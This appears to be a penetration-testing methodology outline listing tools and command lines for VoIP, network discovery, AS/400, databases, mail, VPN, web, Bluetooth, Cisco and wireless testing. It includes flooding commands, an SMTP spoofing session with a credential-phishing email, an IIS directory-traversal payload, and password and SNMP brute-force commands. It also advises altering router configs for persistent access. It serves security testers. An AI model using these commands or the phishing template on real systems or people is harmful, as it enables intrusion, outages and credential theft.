
1. VoIP Security
1.1. Sniffing Tools
1.1.1. AuthTool
1.1.2. Cain & Abel
1.1.3. Etherpeek
1.1.4. NetDude
1.1.5. Oreka
1.1.6. PSIPDump
1.1.7. SIPomatic
1.1.8. SIPv6 Analyzer
1.1.9. UCSniff
1.1.10. VoiPong
1.1.11. VOMIT
1.1.12. Wireshark
1.1.13. WIST - Web Interface for SIP Trace
1.2. Scanning and Enumeration Tools
1.2.1. enumIAX
1.2.2. fping
1.2.3. IAX Enumerator
1.2.4. iWar
1.2.5. Nessus
1.2.6. Nmap
1.2.7. SIP Forum Test Framework (SFTF)
1.2.8. SIPcrack
1.2.9. sipflanker
1.2.9.1. python sipflanker.py 192.168.1-254
1.2.10. SIP-Scan
1.2.11. SIP.Tastic
1.2.12. SIPVicious
1.2.13. SiVuS
1.2.14. SMAP
1.2.14.1. smap IP_Address/Subnet_Mask
1.2.14.2. smap -o IP_Address/Subnet_Mask
1.2.14.3. smap -l IP_Address
1.2.15. snmpwalk
1.2.16. VLANping
1.2.17. VoIPAudit
1.2.18. VoIP GHDB Entries
1.2.19. VoIP Voicemail Database
1.3. Packet Creation and Flooding Tools
1.3.1. H.323 Injection Files
1.3.2. H225regreject
1.3.3. IAXHangup
1.3.4. IAXAuthJack
1.3.5. IAX.Brute
1.3.6. IAXFlooder
1.3.6.1. ./iaxflood sourcename destinationname numpackets
1.3.7. INVITE Flooder
1.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets
1.3.8. kphone-ddos
1.3.9. RTP Flooder
1.3.10. rtpbreak
1.3.11. Scapy
1.3.12. Seagull
1.3.13. SIPBomber
1.3.14. SIPNess
1.3.15. SIPp
1.3.16. SIPsak
1.3.16.1. Tracing paths: sipsak -T -s sip:username@domain
1.3.16.2. OPTIONS request: sipsak -vv -s sip:username@domain
1.3.16.3. Query registered bindings: sipsak -I -C empty -a password -s sip:username@domain
1.3.17. SIP-Send-Fun
1.3.18. SIPVicious
1.3.19. Spitter
1.3.20. TFTP Brute Force
1.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>
1.3.21. UDP Flooder
1.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets
1.3.22. UDP Flooder (with VLAN Support)
1.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets
1.3.23. Voiphopper
1.4. Fuzzing Tools
1.4.1. Asteroid
1.4.2. Codenomicon VoIP Fuzzers
1.4.3. Fuzzy Packet
1.4.4. Mu Security VoIP Fuzzing Platform
1.4.5. ohrwurm RTP Fuzzer
1.4.6. PROTOS H.323 Fuzzer
1.4.7. PROTOS SIP Fuzzer
1.4.8. SIP Forum Test Framework (SFTF)
1.4.9. Sip-Proxy
1.4.10. Spirent ThreatEx
1.5. Signaling Manipulation Tools
1.5.1. AuthTool
1.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v
1.5.2. BYE Teardown
1.5.3. Check Sync Phone Rebooter
1.5.4. RedirectPoison
1.5.4.1. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"
1.5.5. Registration Adder
1.5.6. Registration Eraser
1.5.7. Registration Hijacker
1.5.8. SIP-Kill
1.5.9. SIP-Proxy-Kill
1.5.10. SIP-RedirectRTP
1.5.11. SipRogue
1.5.12. vnak
1.6. Media Manipulation Tools
1.6.1. RTP InsertSound
1.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
1.6.2. RTP MixSound
1.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
1.6.3. RTPProxy
1.6.4. RTPInject
1.7. Generic Software Suites
1.7.1. OAT Office Communication Server Tool Assessment
1.7.2. EnableSecurity VOIPPACK
1.7.2.1. Note: Add-on for Immunity CANVAS
1.8. References
1.8.1. URLs
1.8.1.1. Common Vulnerabilities and Exposures (CVE)
1.8.1.1.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip
1.8.1.2. Default Passwords
1.8.1.3. Hacking Exposed VoIP
1.8.1.3.1. Tool Pre-requisites
1.8.1.4. VoIPsa
1.8.2. White Papers
1.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems
1.8.2.2. An Analysis of VoIP Security Threats and Tools
1.8.2.3. Hacking VoIP Exposed
1.8.2.4. Security testing of SIP implementations
1.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks
1.8.2.6. Two attacks against VoIP
1.8.2.7. VoIP Attacks!
1.8.2.8. VoIP Security Audit Program (VSAP)
2. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS fingerprinting, and identifying the remote applications being served. OS fingerprinting, or TCP/IP stack fingerprinting, is the process of determining the operating system in use on a remote host. It is carried out by analysing packets received from the host in question. There are two distinct ways to OS fingerprint: actively (e.g. nmap) or passively (e.g. scanrand). Passive OS fingerprinting determines the remote OS from received packets only and does not require any packets to be sent. Active OS fingerprinting is very noisy: it sends packets to the remote host and waits for a reply (or the lack of one). Different operating systems respond differently to certain types of packet (the response is governed by the relevant RFC plus any proprietary behaviour the vendor, notably Microsoft, has enabled within the system), so custom packets may be sent to elicit those differences. The remote applications being served on a host can be determined from the open ports on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.
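The passive side of the paragraph above, as an added example that is not part of the original framework: a small classifier that reads the TTL and TCP window size out of a raw IPv4/TCP header and matches them against a signature table. The signature table and the packets are constructed for illustration (initial-TTL and window-size pairs are widely cited heuristics, not p0f's or nmap's databases), and the function names are this example's own. The defensive use is asset inventory: running it over captured SYNs shows which OS families are talking on a segment without sending a single probe.

```python
import struct

# Constructed signature table: (initial TTL, TCP window size) -> OS family label.
# Real passive fingerprinters use many more fields (options, MSS, DF, TCP timestamps).
SIGNATURES = {
    (64, 65535): "BSD/macOS-like",
    (64, 29200): "Linux-like",
    (128, 8192): "Windows-like",
    (255, 4128): "Cisco IOS-like",
}

# Common initial TTL values; an observed TTL is rounded up to the nearest one.
INITIAL_TTLS = (32, 64, 128, 255)


def guess_initial_ttl(observed_ttl):
    """Return the most likely initial TTL for an observed (decremented) TTL."""
    for initial in INITIAL_TTLS:
        if observed_ttl <= initial:
            return initial
    return 255


def parse_ipv4_tcp(packet):
    """Extract (ttl, window) from a raw IPv4 header followed by a TCP header."""
    ihl = (packet[0] & 0x0F) * 4          # IPv4 header length in bytes
    ttl = packet[8]                       # TTL is byte 8 of the IPv4 header
    proto = packet[9]                     # protocol number; 6 == TCP
    if proto != 6:
        raise ValueError("not a TCP segment")
    window = struct.unpack("!H", packet[ihl + 14:ihl + 16])[0]  # TCP window at offset 14
    return ttl, window


def describe(packet):
    """Classify a packet and estimate how many hops away the sender is."""
    ttl, window = parse_ipv4_tcp(packet)
    initial = guess_initial_ttl(ttl)
    return {
        "os": SIGNATURES.get((initial, window), "unknown"),
        "hops": initial - ttl,
    }


def classify(packet):
    """Convenience wrapper returning only the OS family label."""
    return describe(packet)["os"]


def build_packet(ttl, window, src=b"\x0a\x00\x00\x01", dst=b"\x0a\x00\x00\x02"):
    """Construct a minimal 20-byte IPv4 header plus a 20-byte TCP SYN (checksums zeroed)."""
    ip_hdr = struct.pack("!BBHHHBBH4s4s",
                         0x45, 0, 40, 0, 0x4000, ttl, 6, 0, src, dst)
    tcp_hdr = struct.pack("!HHIIBBHHH",
                          12345, 80, 0, 0, 0x50, 0x02, window, 0, 0)
    return ip_hdr + tcp_hdr


if __name__ == "__main__":
    # Constructed sample traffic: three SYNs as they might arrive a few hops away.
    for ttl, window in ((126, 8192), (60, 29200), (62, 8192)):
        print(ttl, window, describe(build_packet(ttl, window)))
```

The rounding step is what makes the approach passive: the observed TTL has been decremented by every router on the path, so the initial value is inferred rather than measured, and the difference doubles as a hop-count estimate.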
2.1. Default Port Lists
2.1.1. Windows
2.1.2. *nix
2.2. Enumeration tools and techniques - The vast majority can be used generically; however, certain bespoke applications require their own specific toolsets. Default passwords are platform and vendor specific.
2.2.1. General Enumeration Tools
2.2.1.1. nmap
2.2.1.1.1. nmap -n -A -PN -p- -T aggressive -iL nmap.targetlist -oX nmap.syn.results.xml
2.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results
2.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results
2.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason
2.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list
2.2.1.2. netcat
2.2.1.2.1. nc -v -n IP_Address port
2.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number
2.2.1.3. amap
2.2.1.3.1. amap -bqv 192.168.1.1 80
2.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
2.2.1.4. xprobe2
2.2.1.4.1. xprobe2 192.168.1.1
2.2.1.5. sinfp
2.2.1.5.1. ./sinfp.pl -i -p
2.2.1.6. nbtscan
2.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)
2.2.1.7. hping
2.2.1.7.1. hping ip_address
2.2.1.8. scanrand
2.2.1.8.1. scanrand ip_address:all
2.2.1.9. unicornscan
2.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E
2.2.1.10. netenum
2.2.1.10.1. netenum network/netmask timeout
2.2.1.11. fping
2.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)
2.2.2. Firewall Specific Tools
2.2.2.1. firewalk
2.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
2.2.2.2. ftester
2.2.2.2.1. Host 1: ./ftestd -i eth0 -v ; Host 2: ./ftest -f ftest.conf -v -d 0.01 ; then ./freport ftest.log ftestd.log
2.2.3. Default Passwords (Examine list)
2.2.3.1. Passwords A
2.2.3.2. Passwords B
2.2.3.3. Passwords C
2.2.3.4. Passwords D
2.2.3.5. Passwords E
2.2.3.6. Passwords F
2.2.3.7. Passwords G
2.2.3.8. Passwords H
2.2.3.9. Passwords I
2.2.3.10. Passwords J
2.2.3.11. Passwords K
2.2.3.12. Passwords L
2.2.3.13. Passwords M
2.2.3.14. Passwords N
2.2.3.15. Passwords O
2.2.3.16. Passwords P
2.2.3.17. Passwords R
2.2.3.18. Passwords S
2.2.3.19. Passwords T
2.2.3.20. Passwords U
2.2.3.21. Passwords V
2.2.3.22. Passwords W
2.2.3.23. Passwords X
2.2.3.24. Passwords Y
2.2.3.25. Passwords Z
2.2.3.26. Passwords (Numeric)
2.3. Active Hosts
2.3.1. Open TCP Ports
2.3.2. Closed TCP Ports
2.3.3. Open UDP Ports
2.3.4. Closed UDP Ports
2.3.5. Service Probing
2.3.5.1. SMTP Mail Bouncing
2.3.5.2. Banner Grabbing
2.3.5.2.1. Other
2.3.5.2.2. HTTP
2.3.5.2.3. HTTPS
2.3.5.2.4. SMTP
2.3.5.2.5. POP3
2.3.5.2.6. FTP
2.3.6. ICMP Responses
2.3.6.1. Type 3 (Port Unreachable)
2.3.6.2. Type 8 (Echo Request)
2.3.6.3. Type 13 (Timestamp Request)
2.3.6.4. Type 15 (Information Request)
2.3.6.5. Type 17 (Subnet Address Mask Request)
2.3.6.6. Responses from broadcast address
2.3.7. Source Port Scans
2.3.7.1. TCP/UDP 53 (DNS)
2.3.7.2. TCP 20 (FTP Data)
2.3.7.3. TCP 80 (HTTP)
2.3.7.4. TCP/UDP 88 (Kerberos)
2.3.8. Firewall Assessment
2.3.8.1. Firewalk
2.3.8.2. TCP/UDP/ICMP responses
2.3.9. OS Fingerprint
3. AS/400 Auditing
3.1. Remote
3.1.1. Information Gathering
3.1.1.1. Nmap using common iSeries (AS/400) services.
3.1.1.1.1. Unsecured services (Port;name;description)
3.1.1.1.2. Secured services (Port;name;description)
3.1.1.2. NetCat (old school technique)
3.1.1.2.1. nc -v -z -w timeout target ListOfServices.txt | grep "open"
3.1.1.3. Banners Grabbing
3.1.1.3.1. Telnet
3.1.1.3.2. FTP
3.1.1.3.3. HTTP Banner
3.1.1.3.4. POP3
3.1.1.3.5. SNMP
3.1.1.3.6. SMTP
3.1.2. Users Enumeration
3.1.2.1. Default AS/400 users accounts
3.1.2.2. Error messages
3.1.2.2.1. Telnet Login errors
3.1.2.2.2. POP3 authentication Errors
3.1.2.3. Qsys symbolic link (if ftp is enabled)
3.1.2.3.1. ftp target, then at the ftp> prompt: quote stat ; quote site namefmt 1
3.1.2.3.2. cd /
3.1.2.3.3. quote site listfmt 1
3.1.2.3.4. mkdir temp
3.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')
3.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')
3.1.2.3.7. dir /temp/qsys/*.usrprf
3.1.2.4. LDAP
3.1.2.4.1. Need os400-sys value from ibm-slapdSuffix
3.1.2.4.2. Tool to browse LDAP
3.1.3. Exploitation
3.1.3.1. CVE References
3.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400
3.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0
3.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3
3.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3
3.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0
3.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0
3.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3
3.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0
3.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3
3.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3
3.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3
3.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0
3.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3
3.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3
3.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3
3.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3
3.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3
3.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3
3.1.3.2. Access with Work Station Gateway
3.1.3.2.1. http://target:5061/WSG
3.1.3.2.2. Default AS/400 accounts.
3.1.3.3. Network attacks (next release)
3.1.3.3.1. DB2
3.1.3.3.2. QSHELL
3.1.3.3.3. Hijacking Terminals
3.1.3.3.4. Trojan attacks
3.1.3.3.5. Hacking from AS/400
3.2. Local
3.2.1. System Value Security
3.2.1.1. Untitled
3.2.1.1.1. Untitled
3.2.1.2. Untitled
3.2.1.2.1. Untitled
3.2.1.3. Untitled
3.2.1.3.1. Untitled
3.2.1.4. Untitled
3.2.1.4.1. Recommended value is 30
3.2.2. Password Policy
3.2.2.1. Untitled
3.2.2.1.1. Untitled
3.2.2.2. Untitled
3.2.2.2.1. Untitled
3.2.2.3. Untitled
3.2.2.3.1. Untitled
3.2.2.4. Untitled
3.2.2.4.1. Untitled
3.2.2.5. Untitled
3.2.3. Audit level
3.2.3.1. Untitled
3.2.3.1.1. Recommended value is *SECURITY
3.2.4. Documentation
3.2.4.1. Users class
3.2.4.1.1. Untitled
3.2.4.2. System Audit Settings
3.2.4.2.1. Untitled
3.2.4.3. Special Authorities Definitions
3.2.4.3.1. Untitled
4. Server Specific Tests
4.1. Databases
4.1.1. Direct Access Interrogation
4.1.1.1. MS SQL Server
4.1.1.1.1. Ports
4.1.1.1.2. Version
4.1.1.1.3. osql
4.1.1.2. Oracle
4.1.1.2.1. Ports
4.1.1.2.2. TNS Listener
4.1.1.2.3. SQL Plus
4.1.1.2.4. Default Account/Passwords
4.1.1.2.5. Default SID's
4.1.1.3. MySQL
4.1.1.3.1. Ports
4.1.1.3.2. Version
4.1.1.3.3. Users/Passwords
4.1.1.4. DB2
4.1.1.5. Informix
4.1.1.6. Sybase
4.1.1.7. Other
4.1.2. Scans
4.1.2.1. Default Ports
4.1.2.2. Non-Default Ports
4.1.2.3. Instance Names
4.1.2.4. Versions
4.1.3. Password Attacks
4.1.3.1. Sniffed Passwords
4.1.3.1.1. Cracked Passwords
4.1.3.1.2. Hashes
4.1.3.2. Direct Access Guesses
4.1.4. Vulnerability Assessment
4.1.4.1. Automated
4.1.4.1.1. Reports
4.1.4.1.2. Vulnerabilities
4.1.4.2. Manual
4.1.4.2.1. Patch Levels
4.1.4.2.2. Confirmed Vulnerabilities
4.2. Mail
4.2.1. Scans
4.2.2. Fingerprint
4.2.2.1. Manual
4.2.2.2. Automated
4.2.3. Spoofable
4.2.3.1. Telnet spoof
4.2.3.1.1. telnet target_IP 25
           helo target.com
           mail from: XXXX@XXX.com
           rcpt to: administrator@target.com
           data
           X-Sender: XXXX@XXX.com
           X-Originating-IP: [192.168.1.1]
           X-Originating-Email: [XXXX@XXX.com]
           MIME-Version: 1.0
           To: <administrator@target.com>
           From: < XXXX@XXX.com >
           Subject: Important! Account check required
           Content-Type: text/html
           Content-Transfer-Encoding: 7bit

           Dear Valued Customer,
           The corporate network has recently gone through a critical update to the Active Directory; we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.
           Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>
           Online Security Manager.
           Target Ltd
           XXXX@XXX.com
           .
4.2.4. Relays
4.3. VPN
4.3.1. Scanning
4.3.1.1. 500 UDP IPSEC
4.3.1.2. 1723 TCP PPTP
4.3.1.3. 443 TCP/SSL
4.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27
4.3.1.5. ipsecscan 80.75.68.22 80.75.68.27
4.3.2. Fingerprinting
4.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27
4.3.3. PSK Crack
4.3.3.1. ikeprobe 80.75.68.27
4.3.3.2. sniff for responses with C&A or ikecrack
4.4. Web
4.4.1. Vulnerability Assessment
4.4.1.1. Automated
4.4.1.1.1. Reports
4.4.1.1.2. Vulnerabilities
4.4.1.2. Manual
4.4.1.2.1. Patch Levels
4.4.1.2.2. Confirmed Vulnerabilities
4.4.2. Permissions
4.4.2.1. PUT /test.txt HTTP/1.0
4.4.2.2. CONNECT mail.another.com:25 HTTP/1.0
4.4.2.3. POST http://mail.another.com:25/ HTTP/1.0
         Content-Type: text/plain
         Content-Length: 6
4.4.3. Scans
4.4.4. Fingerprinting
4.4.4.1. Other
4.4.4.2. HTTP
4.4.4.2.1. Commands
4.4.4.2.2. Modules
4.4.4.2.3. File Extensions
4.4.4.3. HTTPS
4.4.4.3.1. Commands
4.4.4.3.2. Commands
4.4.4.3.3. File Extensions
4.4.5. Directory Traversal
4.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
5. Bluetooth Specific Testing
5.1. Bluescanner
5.2. Bluesweep
5.3. btscanner
5.4. Redfang
5.5. Blueprint
5.6. Bluesnarfer
5.7. Bluebugger
5.7.1. bluebugger [OPTIONS] -a <addr> [MODE]
5.8. Blueserial
5.9. Bloover
5.10. Bluesniff
5.11. Exploit Frameworks
5.11.1. BlueMaho
5.11.1.1. Untitled
5.12. Resources
5.12.1. URLs
5.12.1.1. BlueStumbler.org
5.12.1.2. Bluejackq.com
5.12.1.3. Bluejacking.com
5.12.1.4. Bluejackers
5.12.1.5. bluetooth-pentest
5.12.1.6. ibluejackedyou.com
5.12.1.7. Trifinite
5.12.2. Vulnerability Information
5.12.2.1. Common Vulnerabilities and Exposures (CVE)
5.12.2.1.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth
5.12.3. White Papers
5.12.3.1. Bluesnarfing
6. Cisco Specific Testing
6.1. Methodology
6.1.1. Scan & Fingerprint.
6.1.1.1. Untitled
6.1.1.2. Untitled
6.1.1.3. If SNMP is active, then community string guessing should be performed.
6.1.2. Credentials Guessing.
6.1.2.1. Untitled
6.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!
6.1.3. Connect
6.1.3.1. Untitled
6.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.
6.1.4. Check for bugs
6.1.4.1. Untitled
6.1.4.1.1. The most widely known/used are: Nessus, Retina, GFI LanGuard and Core Impact.
6.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln
6.1.5. Further your attack
6.1.5.1. Untitled
6.1.5.1.1. running-config is the currently running configuration. It is loaded from the startup-config on boot. This configuration file is editable and changes take effect immediately, but any changes will be lost once the router is rebooted. It is this file that requires altering to maintain a non-permanent connection through to the internal network.
6.1.5.1.2. startup-config is the boot-up configuration file. It is this file that needs altering to maintain a permanent connection through to the internal network.
6.1.5.2. Untitled
6.1.5.2.1. #> access-list 100 permit ip <IP> any
6.2. Scan & Fingerprint.
6.2.1. Port Scanning
6.2.1.1. nmap
6.2.1.1.1. Untitled
6.2.1.2. Other tools
6.2.1.2.1. Untitled
6.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.
6.2.2. Fingerprinting
6.2.2.1. Untitled
6.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175
6.2.2.2. Untitled
6.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt
6.2.2.2.2. Untitled
6.3. Password Guessing.
6.3.1. Untitled
6.3.1.1. ./CAT -h <IP> -a password.wordlist
6.3.1.2. Untitled
6.3.2. Untitled
6.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]
6.3.2.2. Untitled
6.3.3. Untitled
6.3.3.1. BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco
6.3.3.2. Untitled
6.4. SNMP Attacks.
6.4.1. Untitled
6.4.1.1. ./CAT -h <IP> -w SNMP.wordlist
6.4.1.2. Untitled
6.4.2. Untitled
6.4.2.1. onesixtyone -c SNMP.wordlist <IP>
6.4.2.2. BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175
         Scanning 1 hosts, 64 communities
         10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
         10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
6.4.3. Untitled
6.4.3.1. snmpwalk -v <Version> -c <Community string> <IP>
6.4.3.2. Untitled
6.5. Connecting.
6.5.1. Telnet
6.5.1.1. Untitled
6.5.1.1.1. telnet <IP>
6.5.1.1.2. Sample Banners
6.5.2. SSH
6.5.3. Web Browser
6.5.3.1. Untitled
6.5.3.1.1. This uses a combination of username and password to authenticate. After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:
6.5.3.1.2. Authentication Required
           Enter username and password for "level_15_access" at http://10.1.1.1
           User Name:
           Password:
6.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.
6.5.4. TFTP
6.5.4.1. Untitled
6.5.4.1.1. Untitled
6.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server. Both of these tools require the config files to be saved with default names.
6.5.4.2. Untitled
6.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>
6.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>
6.5.4.2.3. Creating backdoors in Cisco IOS using TCL
6.6. Known Bugs.
6.6.1. Attack Tools
6.6.1.1. Untitled
6.6.1.1.1. Untitled
6.6.1.2. Untitled
6.6.1.2.1. Web browse to the Cisco device: http://<IP>
6.6.1.2.2. Untitled
6.6.1.2.3. Untitled
6.6.1.2.4. Untitled
6.6.1.3. Untitled
6.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt
6.6.2. Common Vulnerabilities and Exposures (CVE) Information
6.6.2.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS
6.7. Configuration Files.
6.7.1. Untitled
6.7.1.1. Configuration files explained
6.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password, which is superseded by the enable secret password for remote access.
6.7.1.1.2. Untitled
6.7.1.1.3. Untitled
6.7.1.1.4. Password Encryption Utilised
6.7.1.1.5. Untitled
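The enable password / enable secret distinction above, together with the running-config versus startup-config point from 6.1.5.1, shown as an added IOS configuration fragment. This is illustrative configuration written for this page, not the framework's own material; the host name and the passphrase placeholder are assumptions, and the weak fragment is the kind of line a configuration review should flag.

```text
! --- Weak (constructed example): the console/enable password stored in clear text ---
hostname EXAMPLE-RTR
enable password router
! 'service password-encryption' would only apply Type 7 obfuscation to that line;
! Type 7 is reversible, so it does not protect the password if the config leaks.

! --- Hardened: enable secret takes precedence over enable password ---
hostname EXAMPLE-RTR
! stored as a salted hash (Type 5, MD5) rather than clear text
enable secret <strong-passphrase>
! remove the weaker fallback entirely rather than leaving both present
no enable password
line vty 0 4
 transport input ssh
 login local

! --- Verify and persist ---
! edits above live only in running-config until written to startup-config
show running-config | include enable
copy running-config startup-config
```

Reviewing a saved configuration for `enable password` and for Type 7 (`7 ...`) strings is the quick check; newer IOS releases also allow a stronger hash type for the secret, which is preferable where available.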
6.7.1.2. Configuration Testing Tools
6.7.1.2.1. Nipper
6.7.1.2.2. fwauto (Beta)
6.8. References.
6.8.1. Cisco IOS Exploitation Techniques
7. Wireless Penetration
7.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester (and hence the customer) a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting with the customer should allow you to estimate the timescales required to carry the assessment out.
7.1.1. Site Map
7.1.1.1. RF Map
7.1.1.1.1. Lines of Sight
7.1.1.1.2. Signal Coverage
7.1.1.2. Physical Map
7.1.1.2.1. Triangulate APs
7.1.1.2.2. Satellite Imagery
7.1.2. Network Map
7.1.2.1. MAC Filter
7.1.2.1.1. Authorised MAC Addresses
7.1.2.1.2. Reaction to Spoofed MAC Addresses
7.1.2.2. Encryption Keys utilised
7.1.2.2.1. WEP
7.1.2.2.2. WPA/PSK
7.1.2.2.3. 802.1x
7.1.2.3. Access Points
7.1.2.3.1. ESSID
7.1.2.3.2. BSSIDs
7.1.2.4. Wireless Clients
7.1.2.4.1. MAC Addresses
7.1.2.4.2. Intercepted Traffic
7.2. Wireless Toolkit
7.2.1. Wireless Discovery
7.2.1.1. Aerosol
7.2.1.2. Airfart
7.2.1.3. Aphopper
7.2.1.4. Apradar
7.2.1.5. BAFFLE
7.2.1.6. inSSIDer
7.2.1.7. iWEPPro
7.2.1.8. karma
7.2.1.9. KisMAC-ng
7.2.1.10. Kismet
7.2.1.11. MiniStumbler
7.2.1.12. Netstumbler
7.2.1.13. Vistumbler
7.2.1.14. Wellenreiter
7.2.1.15. Wifi Hopper
7.2.1.16. WirelessMon
7.2.1.17. WiFiFoFum
7.2.2. Packet Capture
7.2.2.1. Airopeek
7.2.2.2. Airpcap
7.2.2.3. Airtraf
7.2.2.4. Apsniff
7.2.2.5. Cain
7.2.2.6. Commview
7.2.2.7. Ettercap
7.2.2.8. Netmon
7.2.2.8.1. nmwifi
7.2.2.9. Wireshark
7.2.3. EAP Attack tools
7.2.3.1. eapmd5pass
7.2.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump
7.2.3.1.2. Untitled
7.2.4. Leap Attack Tools
7.2.4.1. asleap
7.2.4.2. thc leap cracker
7.2.4.3. anwrap
7.2.5. WEP/WPA Password Attack Tools
7.2.5.1. Airbase
7.2.5.2. Aircrack-ptw
7.2.5.3. Aircrack-ng
7.2.5.4. Airsnort
7.2.5.5. cowpatty
7.2.5.6. FiOS Wireless Key Calculator
7.2.5.7. iWifiHack
7.2.5.8. KisMAC-ng
7.2.5.9. Rainbow Tables
7.2.5.10. wep attack
7.2.5.11. wep crack
7.2.5.12. wzcook
7.2.6. Frame Generation Software
7.2.6.1. Airgobbler
7.2.6.2. airpwn
7.2.6.3. Airsnarf
7.2.6.4. Commview
7.2.6.5. fake ap
7.2.6.6. void 11
7.2.6.7. wifi tap
7.2.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]
7.2.6.8. FreeRADIUS - Wireless Pwnage Edition
7.2.7. Mapping Software
7.2.7.1. Online Mapping
7.2.7.1.1. WIGLE
7.2.7.1.2. Skyhook
7.2.7.2. Tools
7.2.7.2.1. Knsgem
7.2.8. File Format Conversion Tools
